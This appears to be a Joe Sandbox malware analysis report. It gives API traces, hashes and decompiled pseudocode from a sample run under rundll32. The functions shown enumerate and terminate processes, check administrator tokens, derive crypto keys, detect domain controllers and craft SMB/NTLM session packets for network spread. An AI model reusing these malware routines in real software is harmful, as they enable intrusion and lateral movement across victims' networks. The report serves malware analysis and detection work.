                                                                                                                                                  • Opcode Fuzzy Hash: 2bd214999e22e9096820ad34486cfebc0ee9d33974497997056232bf72a05a40
                                                                                                                                                  • Instruction Fuzzy Hash: 174136F1A01216EFEF20CF98C888BA9B7F5EF04355F6588A9D615A7351E334E990CB50
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,047762E0,?,?,?,?), ref: 047760A6
                                                                                                                                                  • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,047762E0,?,?,?,?), ref: 047760BA
                                                                                                                                                  • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,047762E0,?,?,?,?), ref: 047760D3
                                                                                                                                                  • CryptDestroyHash.ADVAPI32(?,?,?,?,047762E0,?,?,?,?), ref: 047760DF
                                                                                                                                                    • Part of subcall function 0477559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 047755BC
                                                                                                                                                    • Part of subcall function 0477559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 047755CB
                                                                                                                                                    • Part of subcall function 0477559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 047755DA
                                                                                                                                                    • Part of subcall function 0477559B: LocalAlloc.KERNEL32(00000040,?), ref: 047755EE
                                                                                                                                                    • Part of subcall function 0477559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04775601
                                                                                                                                                    • Part of subcall function 0477559B: LocalFree.KERNEL32(?), ref: 04775606
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 797921460-0
                                                                                                                                                  • Opcode ID: 252cc5bedb0c2ca4272f15ca6f96ac08d7ffac51ad1c70a0d0cc652bc6096688
                                                                                                                                                  • Instruction ID: a7c9d811756e0ba39ea558cfe286a8b318e24b63cb8138dd250fff239de953ba
                                                                                                                                                  • Opcode Fuzzy Hash: 252cc5bedb0c2ca4272f15ca6f96ac08d7ffac51ad1c70a0d0cc652bc6096688
                                                                                                                                                  • Instruction Fuzzy Hash: D1010C71900208BFEF219F95ECC9DEEBBBDEF04660B904869F101A6140DA71AE41DA20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                  			E047784EE() {
                                                                                                                                                  				char _v524;
                                                                                                                                                  				int _v552;
                                                                                                                                                  				void* _v560;
                                                                                                                                                  				void* _t6;
                                                                                                                                                  				int _t8;
                                                                                                                                                  				int _t12;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  
                                                                                                                                                  				_t6 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                  				_t14 = _t6;
                                                                                                                                                  				if(_t14 != 0xffffffff) {
                                                                                                                                                  					_push( &_v560);
                                                                                                                                                  					_v560 = 0x22c;
                                                                                                                                                  					_t8 = Process32FirstW(_t14); // executed
                                                                                                                                                  					while(_t8 != 0) {
                                                                                                                                                  						if(E047782EE( &_v524) == 0xf4713b0e) {
                                                                                                                                                  							E0477841D(_v552);
                                                                                                                                                  							L7:
                                                                                                                                                  							_t12 = FindCloseChangeNotification(_t14); // executed
                                                                                                                                                  							return _t12;
                                                                                                                                                  						}
                                                                                                                                                  						_t8 = Process32NextW(_t14,  &_v560);
                                                                                                                                                  					}
                                                                                                                                                  					goto L7;
                                                                                                                                                  				}
                                                                                                                                                  				return _t6;
                                                                                                                                                  			}










                                                                                                                                                  0x047784fc
                                                                                                                                                  0x04778502
                                                                                                                                                  0x04778507
                                                                                                                                                  0x0477850f
                                                                                                                                                  0x04778511
                                                                                                                                                  0x0477851b
                                                                                                                                                  0x04778544
                                                                                                                                                  0x04778534
                                                                                                                                                  0x04778550
                                                                                                                                                  0x04778555
                                                                                                                                                  0x04778556
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778556
                                                                                                                                                  0x0477853e
                                                                                                                                                  0x0477853e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04778548
                                                                                                                                                  0x0477855e

                                                                                                                                                  APIs
                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047784FC
                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0477851B
                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0477853E
                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 04778556
                                                                                                                                                    • Part of subcall function 0477841D: GetCurrentProcessId.KERNEL32(?,04778555,?,?), ref: 04778430
                                                                                                                                                    • Part of subcall function 0477841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04778555,?,?), ref: 0477844C
                                                                                                                                                    • Part of subcall function 0477841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04778555,?,?), ref: 04778464
                                                                                                                                                    • Part of subcall function 0477841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04778555,?,?), ref: 0477847D
                                                                                                                                                    • Part of subcall function 0477841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 047784A3
                                                                                                                                                    • Part of subcall function 0477841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 047784BA
                                                                                                                                                    • Part of subcall function 0477841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 047784CB
                                                                                                                                                    • Part of subcall function 0477841D: FreeSid.ADVAPI32(?), ref: 047784D4
                                                                                                                                                    • Part of subcall function 0477841D: CloseHandle.KERNEL32(?), ref: 047784DD
                                                                                                                                                    • Part of subcall function 0477841D: CloseHandle.KERNEL32(?,?,?,?,04778555,?,?), ref: 047784E2
                                                                                                                                                    • Part of subcall function 0477841D: CloseHandle.KERNEL32(00000000,?,?,?,04778555,?,?), ref: 047784E5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseProcess$HandleToken$OpenProcess32$AllocateChangeCheckCreateCurrentDuplicateFindFirstFreeInitializeMembershipNextNotificationSnapshotTerminateToolhelp32
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3524103904-0
                                                                                                                                                  • Opcode ID: f0da5d8821c3764ca15f0deaf3e5d9c772022c6a8c3be7b776165fd8538ebb3a
                                                                                                                                                  • Instruction ID: 9e09c28a23ad3a52ae754f13bc1512c223117a09853780b747ed4a8d92d024fc
                                                                                                                                                  • Opcode Fuzzy Hash: f0da5d8821c3764ca15f0deaf3e5d9c772022c6a8c3be7b776165fd8538ebb3a
                                                                                                                                                  • Instruction Fuzzy Hash: 43F06D31501124AADF207AB5EC0DBDE7B6CDF09368F924191F915F2290EB74AA448A96
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E0477554A(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				long** _t8;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				int _t15;
                                                                                                                                                  
                                                                                                                                                  				_t15 = 0;
                                                                                                                                                  				_v8 = _v8 & 0;
                                                                                                                                                  				_t8 =  &_v8;
                                                                                                                                                  				__imp__CryptAcquireContextW(_t8, 0, 0, 0x18, 0xf0000000, _t14, __ecx); // executed
                                                                                                                                                  				if(_t8 != 0 || GetLastError() == 0x80090016) {
                                                                                                                                                  					_t15 = CryptGenRandom(_v8, _a8, _a4);
                                                                                                                                                  					CryptReleaseContext(_v8, 0);
                                                                                                                                                  				}
                                                                                                                                                  				return _t15;
                                                                                                                                                  			}







                                                                                                                                                  0x04775556
                                                                                                                                                  0x04775558
                                                                                                                                                  0x0477555d
                                                                                                                                                  0x04775561
                                                                                                                                                  0x04775569
                                                                                                                                                  0x0477558c
                                                                                                                                                  0x0477558e
                                                                                                                                                  0x0477558e
                                                                                                                                                  0x04775598

                                                                                                                                                  APIs
                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,0477790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04775561
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0477790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,047779E8), ref: 0477556B
                                                                                                                                                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,0477790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,047779E8), ref: 04775581
                                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,0477790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,047779E8), ref: 0477558E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2963463078-0
                                                                                                                                                  • Opcode ID: 8d618ea825d8bc9757092eb283c945d88ece690d771d412ff7b6b49c236ddf67
                                                                                                                                                  • Instruction ID: 7206c03016aff2e1735883881da12bb50ca42fea4dec85ee43a54e33e402813e
                                                                                                                                                  • Opcode Fuzzy Hash: 8d618ea825d8bc9757092eb283c945d88ece690d771d412ff7b6b49c236ddf67
                                                                                                                                                  • Instruction Fuzzy Hash: 3AF01236500208FBDF205B95ED09FCE7B7AEFC4715F608414F605D2110D6749E01E710
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                  			E04775507(intOrPtr _a4) {
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				void* _t7;
                                                                                                                                                  				intOrPtr* _t8;
                                                                                                                                                  
                                                                                                                                                  				_t8 = __imp__CryptAcquireContextW;
                                                                                                                                                  				_t3 =  *_t8(_a4, 0, 0, 0x18, 0xf0000000); // executed
                                                                                                                                                  				_t7 = _t3;
                                                                                                                                                  				if(_t7 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                  					_t7 =  *_t8(_a4, _t7, _t7, 0x18, 8);
                                                                                                                                                  				}
                                                                                                                                                  				return _t7;
                                                                                                                                                  			}






                                                                                                                                                  0x0477550c
                                                                                                                                                  0x04775520
                                                                                                                                                  0x04775522
                                                                                                                                                  0x04775526
                                                                                                                                                  0x04775540
                                                                                                                                                  0x04775540
                                                                                                                                                  0x04775547

                                                                                                                                                  APIs
                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,047762C3,?), ref: 04775520
                                                                                                                                                  • GetLastError.KERNEL32(?,047762C3,?), ref: 04775528
                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,047762C3,?), ref: 0477553E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AcquireContextCrypt$ErrorLast
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2779411412-0
                                                                                                                                                  • Opcode ID: bf7c2cd1d1490f338e648adff6b375c47547f52d34d4fb6ee98b1d39af83c302
                                                                                                                                                  • Instruction ID: f4d1ac76a2822d2e866e10ab5de1d8ca2b2c41c44a4378e2e57110212ac47b82
                                                                                                                                                  • Opcode Fuzzy Hash: bf7c2cd1d1490f338e648adff6b375c47547f52d34d4fb6ee98b1d39af83c302
                                                                                                                                                  • Instruction Fuzzy Hash: 73E04F7138431D7AFB201A989C81F963A9EDB18754F608026F700A6191CAD1AD0557A4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                  			E04777D4E(void* __ecx) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				void** _t9;
                                                                                                                                                  				signed char _t12;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				void* _t15;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  
                                                                                                                                                  				_t9 =  &_v8;
                                                                                                                                                  				_t16 = 0;
                                                                                                                                                  				_v8 = _v8 & 0;
                                                                                                                                                  				__imp__NetServerGetInfo(0, 0x65, _t9, _t15, __ecx); // executed
                                                                                                                                                  				_t14 = _v8;
                                                                                                                                                  				if(_t9 == 0) {
                                                                                                                                                  					_t12 =  *(_t14 + 0x10);
                                                                                                                                                  					if((_t12 & 0x00008000) != 0 || (_t12 & 0x00000018) != 0) {
                                                                                                                                                  						_t16 = 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_t14 != 0) {
                                                                                                                                                  					NetApiBufferFree(_t14);
                                                                                                                                                  				}
                                                                                                                                                  				return _t16;
                                                                                                                                                  			}









                                                                                                                                                  0x04777d53
                                                                                                                                                  0x04777d57
                                                                                                                                                  0x04777d59
                                                                                                                                                  0x04777d5f
                                                                                                                                                  0x04777d65
                                                                                                                                                  0x04777d6a
                                                                                                                                                  0x04777d6c
                                                                                                                                                  0x04777d74
                                                                                                                                                  0x04777d7c
                                                                                                                                                  0x04777d7c
                                                                                                                                                  0x04777d74
                                                                                                                                                  0x04777d7f
                                                                                                                                                  0x04777d82
                                                                                                                                                  0x04777d82
                                                                                                                                                  0x04777d8c

                                                                                                                                                  APIs
                                                                                                                                                  • NetServerGetInfo.NETAPI32(00000000,00000065,?,73F1C4E0,?,?,04778C7C), ref: 04777D5F
                                                                                                                                                  • NetApiBufferFree.NETAPI32(?,?,?,04778C7C), ref: 04777D82
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BufferFreeInfoServer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3855943681-0
                                                                                                                                                  • Opcode ID: e075aad3122ac2568b6e4e8ab8b62e9e6e55608f03e88f3cfec3adcfe563d495
                                                                                                                                                  • Instruction ID: 49913de9b4c5e451aa083fb9c8db6f8412d6978cf7a0cb195599ff387e5c4d37
                                                                                                                                                  • Opcode Fuzzy Hash: e075aad3122ac2568b6e4e8ab8b62e9e6e55608f03e88f3cfec3adcfe563d495
                                                                                                                                                  • Instruction Fuzzy Hash: EFE09271701624ABEF38CA55CD08BFA776CDF00BA1B408129AD41E6200E720FE0286D0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 4771747-4771757 1 477175a-4771763 0->1 1->1 2 4771765-4771795 GetProcessHeap HeapAlloc 1->2 3 4771c30-4771c37 2->3 4 477179b-47717a0 2->4 5 47717a2-47717af 4->5 5->5 6 47717b1-47717bb CharUpperW 5->6 7 47717be-47717c7 6->7 7->7 8 47717c9-47717e6 GetProcessHeap HeapAlloc 7->8 9 4771c22-4771c2a GetProcessHeap HeapFree 8->9 10 47717ec-477184b htons 8->10 9->3 11 477184e-4771857 10->11 11->11 12 4771859-477186b send 11->12 13 4771c16-4771c1c GetProcessHeap HeapFree 12->13 14 4771871-477188a recv 12->14 13->9 14->13 15 4771890-47718a5 14->15 15->13 16 47718ab-47718ad 15->16 17 47718ae-47718c1 16->17 18 47718c3-47718c5 17->18 19 47718ce-47718d2 17->19 18->19 20 47718c7-47718cc 18->20 19->17 21 47718d4 19->21 20->19 22 47718d9-4771904 GetProcessHeap HeapAlloc 20->22 21->13 22->13 23 477190a-4771926 call 47715a7 22->23 26 477192c-4771948 call 47715a7 23->26 27 4771c08-4771c10 GetProcessHeap HeapFree 23->27 26->27 30 477194e-4771962 GetProcessHeap HeapAlloc 26->30 27->13 31 4771bfa-4771c02 GetProcessHeap HeapFree 30->31 32 4771968-477197c 30->32 31->27 33 4771983-4771994 rand 32->33 33->33 34 4771996-47719ae call 47715a7 33->34 37 47719b4-47719c2 GetProcessHeap HeapAlloc 34->37 38 4771bec-4771bf4 GetProcessHeap HeapFree 34->38 39 4771bde-4771be6 GetProcessHeap HeapFree 37->39 40 47719c8-47719e5 37->40 38->31 39->38 41 47719e7-47719ed 40->41 42 47719f4-4771a08 40->42 41->42 43 4771a0e-4771a20 GetProcessHeap HeapAlloc 42->43 44 4771a0a 42->44 45 4771a26-4771a74 htons 43->45 46 4771bc3-4771bdb GetProcessHeap HeapFree 43->46 44->43 47 4771a76-4771a79 45->47 48 4771a7d-4771ad1 45->48 46->39 47->48 49 4771ad3-4771b0c 48->49 50 4771b0e-4771b2d 48->50 51 4771b31-4771b55 memcpy 49->51 50->51 52 4771b57-4771b64 51->52 53 4771b66-4771b6f 51->53 54 4771b71-4771b82 send 52->54 53->54 55 4771b84-4771b9b recv 54->55 56 4771bb3-4771bbd GetProcessHeap HeapFree 54->56 55->56 57 4771b9d-4771ba1 55->57 56->46 58 4771ba7-4771bb0 memset 57->58 59 4771ba3 57->59 58->56 59->58
                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                  			E04771747(intOrPtr _a4, void** _a8, long _a12, void* _a16, signed int _a20, void* _a24) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				int _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				void* _v24;
                                                                                                                                                  				void* _v28;
                                                                                                                                                  				void* _v32;
                                                                                                                                                  				void* _v36;
                                                                                                                                                  				void* _v40;
                                                                                                                                                  				void _v44;
                                                                                                                                                  				void* _v48;
                                                                                                                                                  				intOrPtr* _t165;
                                                                                                                                                  				signed short _t168;
                                                                                                                                                  				int _t170;
                                                                                                                                                  				signed short* _t175;
                                                                                                                                                  				intOrPtr* _t177;
                                                                                                                                                  				void* _t187;
                                                                                                                                                  				short _t189;
                                                                                                                                                  				short _t193;
                                                                                                                                                  				signed char* _t194;
                                                                                                                                                  				void* _t198;
                                                                                                                                                  				void* _t201;
                                                                                                                                                  				signed int _t205;
                                                                                                                                                  				void* _t209;
                                                                                                                                                  				void* _t212;
                                                                                                                                                  				long _t215;
                                                                                                                                                  				int _t216;
                                                                                                                                                  				void* _t218;
                                                                                                                                                  				void* _t222;
                                                                                                                                                  				void* _t235;
                                                                                                                                                  				short _t237;
                                                                                                                                                  				short _t240;
                                                                                                                                                  				char _t244;
                                                                                                                                                  				char _t245;
                                                                                                                                                  				char _t246;
                                                                                                                                                  				short _t250;
                                                                                                                                                  				void* _t253;
                                                                                                                                                  				void* _t257;
                                                                                                                                                  				short _t258;
                                                                                                                                                  				intOrPtr _t261;
                                                                                                                                                  				void* _t264;
                                                                                                                                                  				void* _t266;
                                                                                                                                                  				signed int _t267;
                                                                                                                                                  				void* _t268;
                                                                                                                                                  				signed int _t269;
                                                                                                                                                  				void* _t271;
                                                                                                                                                  				intOrPtr* _t282;
                                                                                                                                                  				signed int _t285;
                                                                                                                                                  				intOrPtr _t288;
                                                                                                                                                  				signed int _t289;
                                                                                                                                                  				short _t292;
                                                                                                                                                  				intOrPtr _t293;
                                                                                                                                                  				WCHAR* _t294;
                                                                                                                                                  				intOrPtr _t295;
                                                                                                                                                  				signed char _t297;
                                                                                                                                                  				signed int _t300;
                                                                                                                                                  				intOrPtr _t302;
                                                                                                                                                  				void* _t304;
                                                                                                                                                  				void* _t305;
                                                                                                                                                  				signed int* _t308;
                                                                                                                                                  				void* _t309;
                                                                                                                                                  				void* _t315;
                                                                                                                                                  				void* _t319;
                                                                                                                                                  				void* _t321;
                                                                                                                                                  				void* _t322;
                                                                                                                                                  				signed short _t325;
                                                                                                                                                  				void* _t328;
                                                                                                                                                  				void* _t329;
                                                                                                                                                  				void* _t330;
                                                                                                                                                  				void* _t331;
                                                                                                                                                  
                                                                                                                                                  				_t165 = _a16;
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t266 = _t165 + 2;
                                                                                                                                                  				do {
                                                                                                                                                  					_t293 =  *_t165;
                                                                                                                                                  					_t165 = _t165 + 2;
                                                                                                                                                  				} while (_t293 != 0);
                                                                                                                                                  				_t168 = _t165 - _t266 >> 0x00000001 & 0x0000ffff;
                                                                                                                                                  				_v12 = _t168;
                                                                                                                                                  				_t170 = (_t168 & 0x0000ffff) + (_t168 & 0x0000ffff);
                                                                                                                                                  				_v16 = _t170;
                                                                                                                                                  				_t294 = HeapAlloc(GetProcessHeap(), 8, _t170 + 2);
                                                                                                                                                  				_v36 = _t294;
                                                                                                                                                  				if(_t294 == 0) {
                                                                                                                                                  					L53:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t175 = _a16;
                                                                                                                                                  				_t304 = _t294 - _t175;
                                                                                                                                                  				do {
                                                                                                                                                  					_t267 =  *_t175 & 0x0000ffff;
                                                                                                                                                  					 *(_t304 + _t175) = _t267;
                                                                                                                                                  					_t175 =  &(_t175[1]);
                                                                                                                                                  				} while (_t267 != 0);
                                                                                                                                                  				CharUpperW(_t294);
                                                                                                                                                  				_t177 = _a20;
                                                                                                                                                  				_t268 = _t177 + 2;
                                                                                                                                                  				do {
                                                                                                                                                  					_t295 =  *_t177;
                                                                                                                                                  					_t177 = _t177 + 2;
                                                                                                                                                  				} while (_t295 != 0);
                                                                                                                                                  				_v32 = _t177 - _t268 >> 0x00000001 & 0x0000ffff;
                                                                                                                                                  				_t305 = HeapAlloc(GetProcessHeap(), 8, 0x86);
                                                                                                                                                  				_v28 = _t305;
                                                                                                                                                  				if(_t305 == 0) {
                                                                                                                                                  					L52:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v36);
                                                                                                                                                  					goto L53;
                                                                                                                                                  				}
                                                                                                                                                  				_t321 =  *_a8;
                                                                                                                                                  				_t269 = 9;
                                                                                                                                                  				 *((short*)(_t321 + 0x20)) = 0;
                                                                                                                                                  				_t187 = memcpy(_t305, _t321, _t269 << 2);
                                                                                                                                                  				_t329 = _t328 + 0xc;
                                                                                                                                                  				__imp__#9(0x82);
                                                                                                                                                  				_t322 = _v28;
                                                                                                                                                  				 *(_t322 + 2) = _t187;
                                                                                                                                                  				 *((short*)(_t322 + 0x29)) = 0x1104;
                                                                                                                                                  				_t189 = 2;
                                                                                                                                                  				 *((short*)(_t322 + 0x2b)) = _t189;
                                                                                                                                                  				_t271 = 0x42;
                                                                                                                                                  				 *((short*)(_t322 + 0x2d)) = 1;
                                                                                                                                                  				 *((short*)(_t322 + 0x33)) = 0;
                                                                                                                                                  				_t193 = 0x47;
                                                                                                                                                  				 *((short*)(_t322 + 0x3d)) = _t193;
                                                                                                                                                  				 *((char*)(_t322 + 8)) = 0x73;
                                                                                                                                                  				 *((short*)(_t322 + 0x24)) = 0xff0c;
                                                                                                                                                  				 *((intOrPtr*)(_t322 + 0x39)) = 0x8000c044;
                                                                                                                                                  				_t308 = 0x47835f0;
                                                                                                                                                  				_t194 = _t322 + 0x3f;
                                                                                                                                                  				do {
                                                                                                                                                  					_t297 =  !( *_t308);
                                                                                                                                                  					_t308 =  &(_t308[0]);
                                                                                                                                                  					 *_t194 = _t297;
                                                                                                                                                  					_t194 =  &(_t194[1]);
                                                                                                                                                  					_t271 = _t271 - 1;
                                                                                                                                                  				} while (_t271 != 0);
                                                                                                                                                  				__imp__#19(_a4, _t322, 0x86, _t271); // executed
                                                                                                                                                  				if(_t194 <= 0) {
                                                                                                                                                  					L51:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _t322);
                                                                                                                                                  					goto L52;
                                                                                                                                                  				}
                                                                                                                                                  				_t309 = _a24;
                                                                                                                                                  				__imp__#16(_a4, _t309, 0xffff, 0); // executed
                                                                                                                                                  				if(_t194 <= 0x84) {
                                                                                                                                                  					goto L51;
                                                                                                                                                  				}
                                                                                                                                                  				 *((short*)( *_a8 + 0x20)) =  *((intOrPtr*)(_t309 + 0x20));
                                                                                                                                                  				if( *((intOrPtr*)(_t309 + 9)) != 0xc0000016) {
                                                                                                                                                  					goto L51;
                                                                                                                                                  				}
                                                                                                                                                  				_t198 = 0x2d;
                                                                                                                                                  				while(1) {
                                                                                                                                                  					_t300 =  *(_t198 + _t309 + 4) ^ 0x00505353;
                                                                                                                                                  					if(( *(_t198 + _t309) ^ 0x4d4c544e) == 0 && _t300 == 0 &&  *((intOrPtr*)(_t198 + _t309 + 8)) == 2) {
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					_t198 = _t198 + 1;
                                                                                                                                                  					if(_t198 < 0x70) {
                                                                                                                                                  						continue;
                                                                                                                                                  					}
                                                                                                                                                  					goto L51;
                                                                                                                                                  				}
                                                                                                                                                  				_v44 =  *((intOrPtr*)(_t198 + _t309 + 0x18));
                                                                                                                                                  				_v40 =  *((intOrPtr*)(_t198 + _t309 + 0x1c));
                                                                                                                                                  				 *_a12 =  *((intOrPtr*)(_t198 + _t309 + 0x30));
                                                                                                                                                  				_t201 = HeapAlloc(GetProcessHeap(), 8, 0x18);
                                                                                                                                                  				_v24 = _t201;
                                                                                                                                                  				if(_t201 == 0) {
                                                                                                                                                  					goto L51;
                                                                                                                                                  				}
                                                                                                                                                  				_t205 = E047715A7(_a20, (_v32 & 0x0000ffff) + (_v32 & 0x0000ffff), 0,  &_v24, 0x8002); // executed
                                                                                                                                                  				if(_t205 != 0) {
                                                                                                                                                  					L50:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v24);
                                                                                                                                                  					goto L51;
                                                                                                                                                  				}
                                                                                                                                                  				_a20 = _a20 & _t205;
                                                                                                                                                  				_t209 = E047715A7(_v36, _v16, _v24,  &_a20, 0x8003); // executed
                                                                                                                                                  				if(_t209 != 0) {
                                                                                                                                                  					goto L50;
                                                                                                                                                  				}
